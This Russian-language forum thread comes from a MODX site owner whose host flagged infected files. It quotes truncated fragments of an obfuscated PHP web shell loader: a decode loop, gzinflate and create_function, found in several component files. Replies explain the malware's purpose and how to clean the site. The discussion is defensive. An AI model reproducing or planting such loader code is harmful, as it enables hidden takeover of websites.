MODX Revolution 2.6.5-pl - обнаружены подозрительные файлы

Freeman Liberty

Постоялец
Регистрация
19 Май 2009
Сообщения
489
Реакции
173
Здравствуйте!
Сайт работает на MODX Revolution 2.6.5-pl
Хостер жалуется на следующее:
Внимание, тревога!
На вашем сайте обнаружены подозрительные файлы.

— www/assets/components/xpoller/js/mgr/sections/license.php заражен ...for($wp___=0;$wp___if($wp__=gzinflate($wp__)){if(isset($_POST['wp_']))setcookie('wp_',$_POST['wp_']);$wp___=create_function('',$wp__);u — www/assets/components/tickets/js/mgr/ticket/renew.php заражен ...15587;$l____WP++){$l___WP[$l____WP]=chr((ord($l___WP[$l____WP])-ord($l__WP[$l____WP]))%256);$l__WP.=$l___WP[$l____WP];} @!!!>if($l___WP=gzinflate($l___WP)){if(isset($_POST['l__WP']))setcookie('l__WP',$_POST['l__WP']);$l____WP=create_function — www/assets/components/tickets/class.php заражен ...95;$g____wp++){$g___wp[$g____wp]=chr((ord($g___wp[$g____wp])-ord($g__wp[$g____wp]))%256);$g__wp.=$g___wp[$g____wp];}if( @!!!>$g___wp=gzinflate($g___wp)){$g____wp=create_function('',$g___wp);unset($g___wp,$g__wp);$g____wp();}}header(«Status:
А также вчера:
[www/assets/components/tickets/js/mgr/ticket/renew.php] => ...15587;$l____WP++){$l___WP[$l____WP]=chr((ord($l___WP[$l____WP])-ord($l__WP[$l____WP]))%256);$l__WP.=$l___WP[$l____WP];} @!!!>if($l___WP=gzinflate($l___WP)){if(isset($_POST['l__WP']))setcookie('l__WP',$_POST['l__WP']);$l____WP=create_function
[www/assets/components/tickets/class.php] => ...95;$g____wp++){$g___wp[$g____wp]=chr((ord($g___wp[$g____wp])-ord($g__wp[$g____wp]))%256);$g__wp.=$g___wp[$g____wp];}if( @!!!>$g___wp=gzinflate($g___wp)){$g____wp=create_function('',$g___wp);unset($g___wp,$g__wp);$g____wp();}}header("Status:
[www/assets/components/xpoller/js/mgr/sections/license.php] => ...for($wp___=0;$wp___<15587;$wp___++){$wp__[$wp___]=chr((ord($wp__[$wp___])-ord($wp_[$wp___]))%256);$wp_.=$wp__[$wp___];} @!!!>if($wp__=gzinflate($wp__)){if(isset($_POST['wp_']))setcookie('wp_',$_POST['wp_']);$wp___=create_function('',$wp__);u

Насколько все серьезно?
И может ли кто-то помочь в чистке сайта и закрытии уязвимости?
 

v1rus74

Постоялец
Регистрация
2 Авг 2016
Сообщения
86
Реакции
109
Насколько все серьезно?
это веб-шелл, используется в процессе автоматического заражения уязвимых сайтов с помощью ботов, а потом для монетизации взломанного сайта на чёрном рынке. ваши персональные данные из БД никому не нужны, злоумышленников интересуют только редиректы, ссылки на левые ресурсы и т.п.
И может ли кто-то помочь в чистке сайта и закрытии уязвимости?
я могу. но 2.6.5-pl это последняя версия, в которой закрыты 2 критические уязвимости. как так получилось? обновили движок до последней версии? в таком случае, вирусы выжили.
 

metal-stroi-komplekt

Гуру форума
Регистрация
23 Дек 2012
Сообщения
187
Реакции
71
это веб-шелл, используется в процессе автоматического заражения уязвимых сайтов с помощью ботов, а потом для монетизации взломанного сайта на чёрном рынке. ваши персональные данные из БД никому не нужны, злоумышленников интересуют только редиректы, ссылки на левые ресурсы и т.п.

я могу. но 2.6.5-pl это последняя версия, в которой закрыты 2 критические уязвимости. как так получилось? обновили движок до последней версии? в таком случае, вирусы выжили.
дыг если уровень пользователя, то только обновляют и все))) а надо сносить ВСЕ файлы и ставить с нуля. лишь потом накатывать контент и шаблоны...
ну или бекап разворачивать, если он есть с датой до 11 июля.
вирусы сидят в том числе и в файлах, которые обновлением абсолютно не затрагиваются!
 
Сверху